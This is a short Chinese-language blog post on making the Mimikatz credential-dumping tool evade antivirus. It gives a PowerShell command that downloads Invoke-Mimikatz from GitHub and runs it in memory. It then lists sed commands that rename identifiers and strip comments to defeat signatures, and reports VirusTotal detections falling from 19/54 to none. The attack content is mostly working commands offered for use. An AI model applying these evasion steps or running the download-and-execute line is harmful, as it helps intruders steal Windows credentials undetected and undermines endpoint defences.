MENU

绕过杀毒软件运行Mimikatz

January 7, 2017 • Security

使用PowerSploit运行PowerShell脚本Invoke-Mimikatz被Windows Defender标记为恶意

powershell "IEX (New-Object Net.WebClient).DownloadString
('https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/
Invoke-Mimikatz.ps1');Invoke-Mimikatz"

image03.png

image02.png

VirusTotal查杀结果:19/54

image01.png

使用Linux命令将Invoke-Mimikatz更改为Invoke-Mimidogz,可以将检测率降至8/54。

sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1

image00.png

删除不必要的注释

sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1

sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1

image07.png

将Katz重命名为Dogz并删除注释后,检测率下降到了4/54

DumpCreds改为DumpCred

image06.png

操作下来只有两个杀毒检测出这个文件是恶意的。

再添加三个匹配和替换的规则看看

sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1

sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1

sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1

sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1

sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' 
Invoke-Mimikatz.ps1

sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions 
\$Win32Functions #\-/g" Invoke-Mimikatz.ps1

pasted-image-0.png

匹配和替换规则后无AV检测

image08.png

Archives QR Code
QR Code for this page
Tipping QR Code